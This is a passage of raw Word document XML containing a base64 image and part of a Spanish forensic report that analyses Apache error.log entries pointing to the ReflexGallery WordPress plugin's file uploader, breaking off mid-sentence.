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&#10;VxAsz2eKyVHD9EZknsn/A/J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wLlX+IAwAAMwgAAA4AAAAAAAAAAAAAAAAAOgIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;CgAAAAAAAAAhADqgxXmjKgEAoyoBABQAAAAAAAAAAAAAAAAA7gUAAGRycy9tZWRpYS9pbWFnZTEu&#10;cG5nUEsBAi0AFAAGAAgAAAAhAJkw8gbeAAAACAEAAA8AAAAAAAAAAAAAAAAAwzABAGRycy9kb3du&#10;cmV2LnhtbFBLAQItABQABgAIAAAAIQCqJg6+vAAAACEBAAAZAAAAAAAAAAAAAAAAAM4xAQBkcnMv&#10;X3JlbHMvZTJvRG9jLnhtbC5yZWxzUEsFBgAAAAAGAAYAfAEAAMEyAQAAAA==&#10;">
                <v:shape id="Imagen 87" o:spid="_x0000_s1198" type="#_x0000_t75" style="position:absolute;width:35452;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IoQygAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pa8JA&#10;FMTvgt9heYI33TXUP6SukhYKQk9q7fk1+0yi2bcxu2r67d1CweMwM79hluvO1uJGra8ca5iMFQji&#10;3JmKCw1f+4/RAoQPyAZrx6ThlzysV/3eElPj7ryl2y4UIkLYp6ihDKFJpfR5SRb92DXE0Tu61mKI&#10;si2kafEe4baWiVIzabHiuFBiQ+8l5efd1WrYvOWh2Wf4+X2xh0N2UrP5z/Gi9XDQZa8gAnXhGf5v&#10;b4yGRE0nycsimU/h71P8A3L1AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAA&#10;FQEAAAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAPlUihDKAAAA&#10;4wAAAA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD+AgAA&#10;AAA=&#10;">
                  <v:imagedata r:id="rId223" o:title=""/>
                </v:shape>
                <v:shape id="_x0000_s1199" type="#_x0000_t202" style="position:absolute;left:36576;top:3189;width:17399;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GRDyQAAAOMAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Pa8Iw&#10;FL8P9h3CG3gZM512oVSjiExwu8g6L95C82y6NS8lSbX79stg4PH9/r/lerQdu6APrSMJz9MMGFLt&#10;dEuNhOPn7qkAFqIirTpHKOEHA6xX93dLVWp3pQ+8VLFhKYRCqSSYGPuS81AbtCpMXY+UuLPzVsV0&#10;+oZrr64p3HZ8lmWCW9VSajCqx63B+rsarIRDfjqYx+H8+r7J5/7tOGzFV1NJOXkYNwtgEcd4E/+7&#10;9zrNL2bFi8iFyOHvpwQAX/0CAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAA&#10;AAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAV&#10;AQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAAWBkQ8kAAADj&#10;AAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAP0CAAAA&#10;AA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5C8649AF" w14:textId="6EB83C63" w:rsidR="00B20FD9" w:rsidRPr="001740C6" w:rsidRDefault="00B20FD9" w:rsidP="00B20FD9">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:rFonts w:cs="Arial"/>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>52</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="133" w:name="_Toc155782619"/>
                        <w:r w:rsidRPr="006E46DF">
                          <w:t>Análisis de Apache error.log.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="133"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00BB27B6" w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Thu Jan 03 07:07:43.230979 2019] [php7:notice] [pid 19951] [client 18.195.165.56:44145] PHP Notice:  A non well formed numeric value encountered in /var/www/html/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php on line 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA57F93" w14:textId="08A62165" w:rsidR="00BB27B6" w:rsidRPr="00E44B9C" w:rsidRDefault="00BB27B6" w:rsidP="00BB27B6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>[Thu Jan 03 07:07:43.230987 2019] [php7:notice] [pid 19951] [client 18.195.165.56:44145] PHP Notice:  A non well formed numeric value encountered in /var/www/html/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php on line 99</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46441E3B" w14:textId="79017955" w:rsidR="00A703AB" w:rsidRDefault="006D6885" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se proceden a evaluar los errores que indican en los archivos indicados, y</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>a que la carga del archivo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> al </w:t>
      </w:r>
      <w:r w:rsidR="009E264A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parecer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> tiene</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> errores en el código en las </w:t>
      </w:r>
      <w:r w:rsidR="009E264A" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 99 y 169. Personalmente, las </w:t>
      </w:r>
      <w:r w:rsidR="00E44B9C" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>líneas</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 99 (</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>case 'm': $val *= 1024;</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) y 169 (</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00E44B9C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>$sizeLimit = ini_get('upload_max_filesize') * 1024 * 1024;</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, no s</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
